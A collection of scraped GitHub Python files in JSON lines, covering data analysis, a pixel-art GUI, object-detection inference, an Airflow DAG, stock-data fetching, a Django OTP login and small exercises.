period:(\", prev_rows_only_mask.sum(),\")\")\n return merged[columns]\n\ndef 
simplify_flow_consecutive_milestones(df):\n \"\"\"\n remove consecutive milestones from the dataframe, to create a simplified flow visualization.\n \"\"\"\n\n # rows_to_delete = _find_consecutive_flow_states(df)\n # print(\"Removed {} duplicate milestone rows\".format(str(len(rows_to_delete))))\n # result = df[~df[\"log_id\"].isin(rows_to_delete)]\n\n return simplify_consecutive_duplicates(df, on_column=\"milestone\")\n\ndef _find_consecutive_duplicates(df, column=\"milestone\"):\n log_ids_to_delete = []\n for idx, conversation_df in df.groupby(df['conversation_id']):\n conversation_df = conversation_df.sort_values(\"response_timestamp\")\n #for each conversation, remove duplicate \n last_value = None\n for index, row in conversation_df.iterrows():\n if row[column] != last_value:\n last_value = row[column]\n else:\n log_ids_to_delete.append(row['log_id'])\n return log_ids_to_delete\n\ndef simplify_consecutive_duplicates(df, on_column=\"milestone\"):\n \"\"\"\n remove consecutive turns from the dataframe, to create a simplified flow visualization.\n \"\"\"\n\n rows_to_delete = _find_consecutive_duplicates(df, on_column)\n print(\"Removed {} duplicate {} rows\".format(str(len(rows_to_delete)), on_column))\n result = df[~df[\"log_id\"].isin(rows_to_delete)]\n return result","repo_name":"watson-developer-cloud/assistant-dialog-flow-analysis","sub_path":"src/conversation_analytics_toolkit/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":23997,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"18"} +{"seq_id":"30993104345","text":"from pyxelate import Pyxelate\r\nfrom skimage import io\r\nimport matplotlib.pyplot as plt\r\nimport tkinter as tk\r\n\r\ndef main():\r\n\timg = io.imread(fname_label)\r\n\theight, width, _ = img.shape \r\n\tfactor = 14\r\n\tcolors = colors_label_format\r\n\tdither = True\r\n\r\n\tp = Pyxelate(height // factor, width // factor, colors, dither)\r\n\timg_small = p.convert(img) 
\r\n\r\n\t_, axes = plt.subplots(1, 2, figsize=(16, 16))\r\n\taxes[0].imshow(img)\r\n\taxes[1].imshow(img_small)\r\n\t# i.savefig(\"res.jpg\")\r\n\tplt.show()\r\n\r\nwindow = tk.Tk()\r\nwindow.geometry(\"400x400\")\r\nwindow.title(\"Pyxel Art generator\")\r\nwindow.resizable(width=True, height=True)\r\nfname_label = tk.Label(window, text=\"\\n\\nВведите название файла:\\n\", font=(\"Arial\", 12))\r\nfname_entry = tk.Entry(window, width=40)\r\nfname_label_format = tk.Label(window, text=\"(допустимые форматы: .png и .jpg) \\n\", font=(\"Arial\", 12), fg=\"orange\")\r\ncolors_label = tk.Label(window, text=\"Введите количество цветов:\\n\", font=(\"Arial\", 12))\r\ncolors_entry = tk.Entry(window, width=20)\r\ncolors_label_format = tk.Label(window, text=\"(от 2 до 32)\\n\", font=(\"Arial\", 12), fg=\"orange\")\r\nbutton = tk.Button(window, text=\"Пикселизировать!\", font=(\"Arial\", 12), command=main)\r\n\r\nfname_label.pack()\r\nfname_entry.pack()\r\nfname_label_format.pack()\r\ncolors_label.pack()\r\ncolors_entry.pack()\r\ncolors_label_format.pack()\r\nbutton.pack()\r\nwindow.mainloop()","repo_name":"Mari525/pyxel-art-generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18120593473","text":"from detectron2.config import get_cfg\nfrom detectron2 import model_zoo\nimport os\nfrom detectron2.engine import DefaultPredictor\nfrom dataset_preprocess.train_test_split import rail_dataset_function\nimport random, cv2\nfrom detectron2.utils.visualizer import Visualizer\nfrom detectron2.data import MetadataCatalog, DatasetCatalog\nfrom detectron2.evaluation import COCOEvaluator, inference_on_dataset\nfrom detectron2.data import build_detection_test_loader\nfrom detectron2.utils.visualizer import ColorMode\nfrom IPython import embed\nimport argparse\nfrom tqdm import tqdm\nimport csv\nimport functools\nfrom 
dataset_preprocess.xml_to_dict import category_ids\n\nthing_classes = list(category_ids.keys())\n\ndef cmp_only_frame_id(s1,s2):\n\n # first 7 are id\n # print(s1)\n # print(s2)\n s1 = int(s1[:7])\n s2 = int(s2[:7])\n\n # last 5 are id\n # s1 = int(s1[-9:-4])\n # s2 = int(s2[-9:-4])\n\n if s1 < s2:\n return -1\n if s1 > s2:\n return 1\n return 0\n\n\n\n\ndef creat_csv(result_save_dir):\n f = open(result_save_dir+'/detection_result_with_blank_frames.csv', 'w')\n csv_writer = csv.writer(f)\n csv_writer.writerow([\"frame_id\", \"xmin\", \"ymin\", \"xmax\", \"ymax\", \"confidence\",\"class\"])\n\n return f, csv_writer\n\n\n### Loading Trained Faster RCNN Model###\nprint('Loading Faster RCNN Model...')\ncfg = get_cfg()\ncfg.merge_from_file(model_zoo.get_config_file(\"COCO-Detection/faster_rcnn_X_101_32x8d_FPN_3x.yaml\"))\n# cfg.DATASETS.TRAIN = (\"rail_train\",)\n# cfg.DATASETS.TEST = ()\ncfg.OUTPUT_DIR = './output_'+str(len(thing_classes))+'_things_sleeper_nonfish'\ncfg.DATALOADER.NUM_WORKERS = 2\ncfg.MODEL.ROI_HEADS.NUM_CLASSES = len(thing_classes) # only has one class (ballon). (see https://detectron2.readthedocs.io/tutorials/datasets.html#update-the-config-for-new-datasets)\n# cfg.MODEL.WEIGHTS = os.path.join(cfg.OUTPUT_DIR, \"model_0484999.pth\") # path to the model we just trained\ncfg.MODEL.WEIGHTS = os.path.join(cfg.OUTPUT_DIR, \"model_0079999.pth\") # path to the model we just trained\ncfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.7 # set a custom testing threshold\ncfg.DATASETS.TEST = ('rail_test',)\ncfg.MODEL.ROI_HEADS.NMS_THRESH_TEST = 0.3\npredictor = DefaultPredictor(cfg)\n\ndata_path = './dataset_preprocess/rail_data/dataset_dicts.npz'\nDatasetCatalog.register(\"rail_\" + \"test\", lambda d=\"test\":rail_dataset_function(data_path, mode=d))\nMetadataCatalog.get(\"rail_\" + \"test\").set(thing_classes=thing_classes)\nrail_metadata = MetadataCatalog.get(\"rail_test\")\n\nprint('Loading Faster RCNN Model... 
Done!')\n\n\n### Run Model on Costum Dataset and Save CSV file ###\nparser = argparse.ArgumentParser(description='Run Faster R-CNN Detector on Unlabeled Rail Data and Save Result as an CSV')\nparser.add_argument('--result_save_dir', type=str,\n default=\"./detection_result_\"+str(len(thing_classes))+'_things',\n help='It is the folder of detection result csv file')\nparser.add_argument('--rail_data_path', type=str,\n default=\"/run/user/1000/gvfs/smb-share:server=ipl-noaa.local,share=homes/rail/Predator_2018/20180824T194439-0800/GO-2400C-PGE+09-88-35\",\n help='It is the folder of rail data, the last folder should be the haul id, e.g. 20180602T112835-master')\nargs = parser.parse_args()\n\n\nrail_data_path = args.rail_data_path\nresult_save_dir = os.path.join(args.result_save_dir, rail_data_path.split('/')[-3],rail_data_path.split('/')[-2])\n\nvisualization_dir = result_save_dir+'/visualization2'\nif not os.path.exists(result_save_dir):\n os.makedirs(result_save_dir)\n os.makedirs(visualization_dir)\n\nf, csv_writer = creat_csv(result_save_dir)\n\n# sort image names in order\nimage_names = sorted([f for f in os.listdir(rail_data_path) if f!=\"Thumbs.db\"], key=functools.cmp_to_key(cmp_only_frame_id))\n\n\n\nnum = 0\nsaved_num=0\nfor img_name in tqdm(image_names):\n if 'jpg' not in img_name and 'png' not in img_name: # skip non image\n continue\n\n im = cv2.imread(os.path.join(rail_data_path, img_name))\n\n if im is None: # skip bad frame\n print('bad frame: %s' %os.path.join(rail_data_path, img_name))\n continue\n\n outputs = predictor(im) # format is documented at https://detectron2.readthedocs.io/tutorials/models.html#model-output-format\n\n if len(outputs[\"instances\"])==0: ### no predicted objects ###\n csv_writer.writerow([img_name, '', '', '', '', 0, ''])\n continue\n # embed()\n\n\n max_score = 0\n for i in range(len(outputs[\"instances\"])):\n xmin = outputs[\"instances\"].to(\"cpu\").pred_boxes.tensor.numpy()[i][0]\n ymin = 
outputs[\"instances\"].to(\"cpu\").pred_boxes.tensor.numpy()[i][1]\n xmax = outputs[\"instances\"].to(\"cpu\").pred_boxes.tensor.numpy()[i][2]\n ymax = outputs[\"instances\"].to(\"cpu\").pred_boxes.tensor.numpy()[i][3]\n score = outputs[\"instances\"].scores[i].item()\n cls = outputs[\"instances\"].pred_classes[i].item()\n\n csv_writer.writerow([img_name,xmin,ymin, xmax, ymax,score, thing_classes[cls]])\n\n if score > max_score:\n max_score=score\n\n if max_score >=0.95 and saved_num<=100: # only save 100 HIGH conf samples\n v = Visualizer(im[:, :, ::-1],\n metadata=rail_metadata,\n scale=0.5,\n instance_mode=ColorMode.IMAdataset_preprocessGE_BW # remove the colors of unsegmented pixels. This option is only available for segmentation models\n )\n # print(outputs['instances'].pred_classes)\n # print(outputs[\"instances\"].pred_boxes)\n out = v.draw_instance_predictions(outputs[\"instances\"].to(\"cpu\"))\n cv2.imwrite(os.path.join(visualization_dir, img_name), out.get_image()[:, :, ::-1])\n saved_num+=1\n\n\n num+=1\n # cv2.imshow('inference sample',out.get_image()[:, :, ::-1])\n # cv2.waitKey(3000)\n # cv2.destroyAllWindows()\n\nf.close()\nprint('Detect %d frames with objects in haul %s'%(num, rail_data_path[rail_data_path.rfind('/')+1:]))","repo_name":"ipl-uw/Detection-Tracking-for-NOAA","sub_path":"inference_for_rail.py","file_name":"inference_for_rail.py","file_ext":"py","file_size_in_byte":5974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22995252762","text":"from enum import Enum, auto\n\nclass Color(Enum):\n White = auto(),\n Blue = auto(),\n Yellow = auto(),\n Black = auto(),\n Green = auto(),\n Red = auto()\n\nclass Length(Enum):\n Ankle = auto(),\n Knee = auto(),\n Calf = auto(),\n MidCalf = auto(),\n Crew = auto(),\n QuarterLength = auto()\n\nclass Material(Enum):\n Cotton = auto(),\n Wool = auto(),\n Nylon = auto(),\n Acrylic = auto(),\n Polyester = auto(),\n Spandex = auto()\n\nclass 
Pattern(Enum):\n Plain = auto(),\n MarkedHeel = auto(),\n MarkedToe = auto(),\n MarkedToeAndHeel = auto(),\n Stars = auto(),\n Stripes = auto()\n\nclass Size(Enum):\n Small = auto(),\n Medium = auto(),\n Large = auto()\n\n","repo_name":"bretgourdie/sock-sorter","sub_path":"SockTraits.py","file_name":"SockTraits.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33962186389","text":"from datetime import timedelta, datetime\nfrom airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\n\n\ndef firstFunctionExecution(**context):\n context['ti'].xcom_push(key = 'mykey', value = 500)\n print(\"hello airflow\")\n return f\"Hello Airflow! by\"\n\ndef seconfFunctionExecution(**context):\n data= context['ti'].xcom_pull(key= 'mykey')\n print(f'Data passed from first function is {data}')\n\n\nwith DAG(\n dag_id='first_dag',\n schedule_interval='@daily',\n default_args={\n 'owner': 'airflow',\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n 'start_date': datetime(2020, 11, 11)\n },\n catchup= False\n ) as f:\n firstFunctionExecute = PythonOperator(task_id = 'firstFunctionExecution',\n python_callable = firstFunctionExecution,\n op_kwargs = {\"Executor\": 'User'}\n )\n secondFunctionExecute = PythonOperator(task_id = 'secondFunctionExecution',\n python_callable = seconfFunctionExecution\n )\nfirstFunctionExecute >> secondFunctionExecute","repo_name":"emfreak22/AirflowDagGeneratiion","sub_path":"Project/dags/first_dag.py","file_name":"first_dag.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22901643625","text":"word = input()\nupper = word.upper()\ndict = {}\nfor x in upper:\n if x in dict:\n dict[x] += 1\n if x not in dict:\n dict[x] = 1\n\nitems = dict.items()\nmaximum = 0\nmaxcount = 0\nmaxlist = []\nmaxnum = []\ncount = 0\nfor k, v 
in items:\n if v > maximum:\n maximum = v\n maxlist = k,v\n else:\n continue\nfor k, v in items:\n if v == max(dict.values()):\n count += 1\nif count > 1:\n print(\"?\")\n quit()\nprint(maxlist[0])\n\n\n\n\n\n\n\n\n","repo_name":"justinkmoon1/Baekjoon1","sub_path":"1157.py","file_name":"1157.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"75197782439","text":"\nimport quandl\nimport pandas\nimport operator\nimport ModuleAmitException\nimport numpy as np\nimport pandas as pd\n\ndef __init__(self):\n print (\"Calling GetNSELiveData constructor\")\n\n\n\ndef getNSELiveData( nseid):\n Authkey = '5_pRK9pKefuvZzHe-MkSy'\n\n nseid = nseid.replace(\"&\", \"\")\n nseid = nseid.replace(\"-\", \"_\")\n nse_dataset = \"NSE\" + \"/\" + nseid\n mydata = quandl.get(nse_dataset, authtoken=Authkey, rows=252, sort_order=\"desc\")\n return mydata\n\ndef getQuandlData( fullid, nseid):\n Authkey = '5_pRK9pKefuvZzHe-MkSy'\n exceptionDir = {\"NIFTY\":\"NIFTY_50\"}\n nseid = nseid.replace(\"&\", \"\")\n nseid = nseid.replace(\"-\", \"_\")\n \n #first check if the nseid is in expetions\n if nseid in exceptionDir:\n nseid = exceptionDir[nseid]\n \n tokens = fullid.split(':')\n exchange = tokens[0]\n ticker = tokens[1]\n if exchange == \"NSE\" :\n dataset = \"NSE\" + \"/\" + nseid\n elif exchange == \"BOM\" :\n #BSE/BOM526652\n dataset = \"BSE\" + \"/\" + exchange+ticker\n else:\n dataset = \"NSE\" + \"/\" + nseid\n \n mydata = quandl.get(dataset, authtoken=Authkey, rows=252, sort_order=\"desc\")\n return mydata\n\n\ndef getHighLowClose(mydata):\n # print mydata\n df = pandas.DataFrame(mydata)\n dd = df.to_dict(orient='dict')\n ddd = dd['Close']\n\n # print df\n # print dd\n # print ddd\n # print max(ddd, key=ddd.get)\n maxKey = max(ddd.items(), key=operator.itemgetter(1))[0]\n maxVal = ddd.get(maxKey)\n print (\"High52 - \", maxVal)\n\n # print min(ddd, key=ddd.get)\n minKey = 
min(ddd.items(), key=operator.itemgetter(1))[0]\n minVal = ddd.get(minKey)\n print( \"Low52 - \", minVal)\n\n last_price = df['Close'][0]\n\n print( \"Last Price - \", last_price)\n\n nsedata = dict()\n nsedata[\"high52\"] = maxVal\n nsedata[\"low52\"] = minVal\n nsedata[\"last_price\"] = last_price\n return nsedata\n \n \ndef getLastDayParams(mydata,fullid,nseid):\n df = mydata[:2]\n try:\n # df.columns = ['open', 'high','low','last','close','volume','turnover']\n if \"NIFTY\" in nseid:\n df = df[['Close', 'Shares Traded']]\n elif \"NSE:\" in fullid:\n df = df[['Close', 'Total Trade Quantity']] \n else:\n df = df[['Close', 'No. of Shares']]\n \n df.columns = ['close', 'volume']\n # df = df.drop(['open', 'high','low','turnover'],1)\n # This sript is run india time and Quandl last record by tnat time is \n # already prevous trading day so no need to shift(-1)\n \n #Amit- now that google has stopped api, we need both today and prev day data\n df['prev_close'] = df['close'].shift(-1)\n# df['prev_close'] = df['close']\n #following line is commented bcoz volume as coming NaN for NIFTY and hence df was getting empties\n# df = df.dropna(axis=0, how='any')\n df['change'] = df['close'] - df['prev_close']\n df['percent_change'] = df['change'] / df['prev_close']\n df['percent_change'] = df['percent_change'].apply(lambda x: x*100)\n # np.round(df, decimals=2)\n df = df.apply(lambda x: np.round(x, decimals=2))\n df['nseid'] = nseid\n# print (df)\n except Exception as e:\n print (\"\\n******Amit Exception in NSELiveDataModule::getLastDayParams \")\n print (str(e))\n ModuleAmitException.printInfo()\n df.iloc[0:0] # emptied the dataframe\n \n return df\n \n \n \n\n ","repo_name":"chsivateja/workspace_pyCharm","sub_path":"NSELiveDataModule.py","file_name":"NSELiveDataModule.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21574946289","text":"def 
kubikwurzel(w,e):\r\n\ttry:float(w) and float(e)\r\n\texcept ValueError:\r\n\t\tif type(w) != float or type(e)!= float:\r\n\t\t\tprint('Wert muss ein Float sein!')\r\n\t\r\n\tfor i in range(1,6):\r\n\t\twert = ((3-1)*wert+w/(wert**(3-1)))/3\r\n\t\twhile abs(wert**3-w)>=epsilon:\r\n\t\t\tif wert**3 bool:\n \"\"\"Determines if the ticket is lucky if the sum of the first three digits\n is equal to the sum of the last three.\n :return bool result. True if ticket is lucky, False if not.\"\"\"\n first_part_ticket = sum(map(int, ticket[:3]))\n second_part_ticket = sum(map(int, ticket[3:]))\n return first_part_ticket == second_part_ticket\n\n\ndef hard_way_determine_lucky_tickets(ticket: str) -> bool:\n \"\"\"Determines if the ticket is lucky if the sum of the even numbers of the ticket\n is equal to the sum of the odd numbers of the ticket.\n :return bool result. True if ticket is lucky, False if not.\"\"\"\n even_numb_sum = 0\n odd_numb_sum = 0\n for numb in ticket:\n if int(numb) % 2 == 0:\n even_numb_sum += int(numb)\n else:\n odd_numb_sum += int(numb)\n return even_numb_sum == odd_numb_sum\n\n\ndef comparison_calculation_methods(min_ticket: str, max_ticket: str):\n \"\"\"Compare easy and hard ways to determine if ticket is lucky. 
Prints result of comparing.\"\"\"\n lucky_tickets_easy_way = 0\n lucky_tickets_hard_way = 0\n if int(min_ticket) < int(max_ticket):\n for ticket in range(int(min_ticket), int(max_ticket)):\n if easy_way_determine_lucky_tickets(str(ticket)):\n lucky_tickets_easy_way += 1\n if hard_way_determine_lucky_tickets(str(ticket)):\n lucky_tickets_hard_way += 1\n\n if lucky_tickets_easy_way > lucky_tickets_hard_way:\n print(f\"Easy way for counting lucky tickets gives {lucky_tickets_easy_way} lucky tickets, \"\n f\"hard way gives {lucky_tickets_hard_way}\")\n elif lucky_tickets_easy_way < lucky_tickets_hard_way:\n print(f\"Hard way for counting lucky tickets gives {lucky_tickets_easy_way} lucky tickets, \"\n f\"easy way gives {lucky_tickets_hard_way}\")\n\n\nif __name__ == '__main__':\n continue_ = True\n while continue_:\n try:\n min_ticket_numb = input(\"Enter min ticket number: \")\n max_ticket_numb = input(\"Enter max ticket number: \")\n if len(min_ticket_numb) == 6 and len(max_ticket_numb) == 6 and min_ticket_numb < max_ticket_numb:\n comparison_calculation_methods(min_ticket_numb, max_ticket_numb)\n else:\n raise ValueError\n except ValueError:\n print(\"Please enter a positive value consisting of 6 numbers. 
\"\n \"Min ticket number should be less than max ticket number.\")\n\n continue_ = input(\"Do you want check another tickets (y / n): \").lower() == \"y\"\n","repo_name":"Tanya-Kr/python_simle_tasks","sub_path":"elementaryTasks/6_happy_tickets/lucky_tickets_functional.py","file_name":"lucky_tickets_functional.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74495589481","text":"from ast import Raise\nimport uuid\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, get_user_model\nfrom django.contrib import messages\nfrom .forms import RegisterForm, LoginForm\nfrom .verify import SendOTP\nfrom .check_code import CheckOTP\n\nUser = get_user_model()\n\ndef register_page(request):\n form = RegisterForm(request.POST or None)\n context = {\n \"form\": form\n }\n\n if form.is_valid():\n username = form.cleaned_data.get(\"username\")\n email = form.cleaned_data.get(\"email\")\n phone_number = form.cleaned_data.get(\"phone_number\")\n new_user = User.objects.create_user(username, email, phone_number, password=None)\n return redirect(\"/login\")\n return render(request, \"auth/register.html\", context)\n\n\ndef login_page(request):\n form = LoginForm(request.POST or None)\n context = {\n \"form\": form\n }\n if form.is_valid():\n phone_number = form.cleaned_data.get('phone_number')\n try:\n new = User.objects.get(phone_number=phone_number)\n print(new, \"NEW_YORK_TIMEZONE\")\n ## if user exists\n ##first: send otp to the user \n SendOTP.send_code(phone_number)\n print(\"Bonjour tout le monde\")\n ##second:redirect to the page to enter otp \n temp = uuid.uuid4()\n return redirect(\"/otp/{}/{}\".format(new.pk, temp))\n except Exception as e:\n messages.error(request, f\"No such user exists! 
{e}\") \n \n return render(request, \"auth/login.html\", context)\n\ndef generate_otp(request, pk, uuid):\n return render(request, 'otp.html')\n\n\ndef check_otp(request):\n otp =request.POST.get(\"secret\")\n phone_number = request.POST.get(\"phone_number\")\n otp_status= CheckOTP.check_otp(phone_number, otp) \n if otp_status == \"approved\":\n try:\n auth_user = User.objects.get(phone_number=phone_number)\n print(auth_user, \"Auth User\")\n user = authenticate(request, email=auth_user.email) \n \n if user is not None:\n login(request, user, backend='verification.auth_backend.PasswordlessAuthBackend')\n return redirect(\"/home\")\n else:\n messages.error(request, \"Wrong OTP!\") \n except:\n Raise(\"User Not Found\")\n\n print(\"otp via form: {}\".format(otp))\n return render(request, \"otp.html\")\n\ndef home_page(request):\n return render(request, \"home_page.html\")","repo_name":"Bamba4/passwordless_django_twilio_send_grid","sub_path":"verification/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"75170785961","text":"import pandas as pd\nimport os\n\n\ndef get_xls_list():\n \"\"\" 获取当前目录的xls文件名列表 \"\"\"\n path = os.path.abspath('.')\n all_excel_name = []\n for file in os.listdir(path):\n if file[-3:] == 'xls':\n all_excel_name.append(file)\n return all_excel_name\n\n\n\"\"\"\n read_excel()参数介绍\n io :excel 路径\n sheetname:默认是sheetname为0,返回多表使用sheetname=[0,1],若sheetname=None是返回全表 。注意:int/string返回的是dataframe,而none和list返回的是dict of dataframe。\n header :指定作为列名的行,默认0,即取第一行,数据为列名行以下的数据;若数据不含列名,则设定 header = None;\n skiprows:省略指定行数的数据\n skip_footer:省略从尾部数的行数据\n index_col :指定列为索引列,也可以使用 u’string\n names:指定列的名字,传入一个list数据\n\n\"\"\"\n\n\ndef combine_xls(xlslist):\n \"\"\" 将xls文件合并,参数为xls文件名的列表\"\"\"\n xls_list = xlslist\n combine = []\n for xls in xls_list:\n data = pd.read_excel(xls)\n combine.append(data)\n writer = 
pd.ExcelWriter('combined.xls')\n pd.concat(combine).to_excel(writer, sheet_name='sheet1', index=False)\n writer.save()\n\n\ndef main():\n combine_xls(get_xls_list())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"L1ttleTomato/file_handling","sub_path":"excelcombine/combine_excel.py","file_name":"combine_excel.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"74841771239","text":"from Web import WebPage\nfrom Web import WebView\nfrom PySide import QtCore\nfrom PySide import QtGui\nfrom PySide import QtNetwork\nfrom PySide import QtWebKit\nimport gc\nimport sys\n\n\nclass mainWindow(QtGui.QWidget) :\n\tdef __init__(self, width = 600, height = 800):\n\t\tsuper(mainWindow, self).__init__()\n\t\tself.width = width\n\t\tself.height = height\n\t\tself.setGeometry(10, 10, self.width, self.height)\n\t\tself.initial()\n\t\t\n\tdef initial(self) :\n\t\tself.MainHLayout = QtGui.QHBoxLayout()\n\t\tself.WebView = WebView()\n\t\t\n\t\tself.WebView.show()\n\t\t\n\t\tself.WebView.load(QtCore.QUrl(\"http://127.0.0.1/tpcdebt/test.php\"))\n\t\t\n\t\tself.MainHLayout.addWidget(self.WebView)\n\t\t\n\t\tself.WebView.loadFinished.connect(self.loadPageOK)\n\t\tself.WebView.page().setLinkDelegationPolicy(QtWebKit.QWebPage.DelegateAllLinks)\n\t\t\n\t\tself.setLayout(self.MainHLayout)\n\t\t\n\t\tself.show()\n\t\t\n\tdef loadPageOK(self, isFinished) :\n\t\tif isFinished :\n\t\t\tprint(\"load OK\")\n\t\t\tpass\n\t\t\t","repo_name":"franksin101/Crawler-and-Server","sub_path":"mainWindow.py","file_name":"mainWindow.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35799112073","text":"from typing import List\n\nfrom webdnn.backend.code_generator.allocator import MemoryLayout\nfrom webdnn.backend.code_generator.injectors.buffer_injector import BufferInjector\nfrom 
webdnn.backend.code_generator.injectors.kernel_name_injector import KernelNameInjector\nfrom webdnn.backend.webassembly.generator import WebassemblyDescriptorGenerator\nfrom webdnn.backend.webassembly.kernel import Kernel\nfrom webdnn.graph.operators.prod import Prod\n\ntemplate = \"\"\"\nvoid %%FUNC_NAME%%(const int * %%META_BUFFER%%)\n{\n const float *X = %%LOAD_BUFFER(prod_X)%%;\n float *Y = %%LOAD_BUFFER(prod_Y)%%;\n const int *y_stride = %%LOAD_BUFFER(prod_y_stride)%%;\n const int *y_shape = %%LOAD_BUFFER(prod_y_shape)%%;\n const int *x_stride = %%LOAD_BUFFER(prod_x_stride)%%;\n const int D = %%LOAD_BUFFER(prod_D)%%;\n const int N = %%LOAD_BUFFER(prod_N)%%;\n const int MAX_GID = %%LOAD_BUFFER(prod_MAX_GID)%%;\n const int x_target_axis_stride = %%LOAD_BUFFER(prod_x_target_axis_stride)%%;\n\n for (int gid = 0; gid < MAX_GID; gid++) {\n int x_index = 0;\n for (int d = 0; d < D; d++) x_index += ((gid / y_stride[d]) % y_shape[d]) * x_stride[d];\n\n float y = 1.0f;\n for (int i = 0; i < N; i++) {\n const float x = X[x_index];\n\n y *= x;\n\n x_index += x_target_axis_stride;\n }\n\n Y[gid] = y;\n }\n}\n\"\"\"\n\n\n@WebassemblyDescriptorGenerator.register_handler(Prod)\ndef prod_handler(op: Prod, memory_layout: MemoryLayout) -> List[Kernel]:\n x = op.inputs[\"x\"]\n y = op.outputs[\"y\"]\n\n axis = op.parameters[\"axis\"]\n\n buffer_injector = BufferInjector()\n buffer_injector.register({\n \"prod_X\": memory_layout[x],\n \"prod_Y\": memory_layout[y],\n \"prod_y_stride\": y.stride,\n \"prod_y_shape\": y.shape,\n \"prod_x_stride\": [x.stride_dict[a] for a in y.order.axes],\n \"prod_D\": y.ndim,\n \"prod_N\": x.shape_dict[axis],\n \"prod_MAX_GID\": y.size,\n \"prod_x_target_axis_stride\": x.stride_dict[axis]\n })\n\n name_injector = KernelNameInjector(op)\n\n source = template\n source = buffer_injector.inject(source)\n source = name_injector.inject(source)\n\n kernel = Kernel(\n {name_injector.name: source},\n name_injector.name,\n buffer_injector.buffer,\n 
buffer_injector.unresolved_value_list\n )\n\n return [kernel]\n","repo_name":"LinXueyuanStdio/hash2face","sub_path":"webdnn/src/graph_transpiler/webdnn/backend/webassembly/kernels/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"40236920820","text":"import numpy as np\n\n# create a deck of cards\ndeck = [4, 4, 4, 4, 4, 4, 4, 4, 4, 16]\nknown_cards = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\ntoken_cards = 0\nnum_players = 0\nmin_dealer_score = -1\n\n# nó thắng thằng 17 nó sẽ từ 18 -> 21 sẽ tính xác suất từ 18 -> 21 tính kì vọng\n# cần nhập min_dealer_score\n\n\ndef input_game():\n my_cards = input(\"Nhập bài trên tay của bạn: \")\n my_cards = [min(int(x), 10) for x in my_cards.split()]\n for i in my_cards:\n deck[i - 1] -= 1\n known_cards[i - 1] += 1\n your_cards = input(\"Nhập bài đã biết: \") # không tính trên tay mình\n your_cards = [min(int(x), 10) for x in your_cards.split()]\n for i in your_cards:\n deck[i - 1] -= 1\n known_cards[i - 1] += 1\n token_cards = int(input(\"Số lá đã rút: \"))\n num_players = int(input(\"Số người chơi: \"))\n min_dealer_score = int(input(\"Điểm tối thiểu của người đặt: \"))\n return token_cards, num_players, min_dealer_score\n\n\n# Test\n\ntoken_cards, num_players, min_dealer_score = input_game()\nprint(52 - 2 * num_players - token_cards)\nprint(known_cards)\nprint(deck)\nprint(min_dealer_score)\n","repo_name":"nguyenvanthanhdat/Vietnamese_Blackjack","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1445595513","text":"from time import strftime, time, localtime\nfrom zlib import compressobj\nimport sys\nimport gzip\n\nfrom Trieste.common.utils import getCaller\n\nclass GzipFile (object):\n def __init__ (self, fileName, mode='r'):\n self.file= file (fileName+'.gz', 
mode)\n self.gzip= compressobj (9)\n\n def write (self, s):\n self.file.write (self.gzip.compress (s))\n\n def close (self):\n self.file.write (self.gzip.flush ())\n self.file.close ()\n\nclass Debugger (object):\n def __init__ (self, fileName=None, compressed=True):\n if fileName:\n if compressed:\n # self.__file= GzipFile (fileName, 'w+', 9)\n self.__file= gzip.open (fileName+'.gz', 'w+', 9)\n else:\n self.__file= file (fileName, 'w+')\n else:\n self.__file= None\n self.__log= []\n\n def __line (self, s):\n now= time ()\n return \"%20.6f: %s\\n\" % (now, s)\n\n def log (self, s):\n # line= self.__line (s)\n # self.__log.append (line)\n # self.__file.write (line)\n self.debug (1, s)\n\n def debug (self, i, s, level=1, fast=True):\n if i==1 or i==5:\n now= time ()\n if fast:\n sys.stderr.write (self.__line (s))\n else:\n (theClass, theMethod, theFileName, theLineNo)= getCaller (level)\n methodStr= \"%s.%s()\" % (theClass, theMethod)\n sys.stderr.write (\"%s [%3d] @ %s.%s: %s\\n\" % (\n methodStr.ljust (20),\n theLineNo,\n strftime (\"%H:%M:%S\", localtime (now)),\n str (round (now-int(now), 4))[2:].ljust (4),\n str(s),\n ))\n\n def saveLog (self):\n return\n if self.__file:\n self.debug (1, 'saving')\n for line in self.__log:\n self.__file.write (line)\n self.__file.close ()\n\nclass Object (object):\n debugger= None\n def __init__ (self, fileName=None, 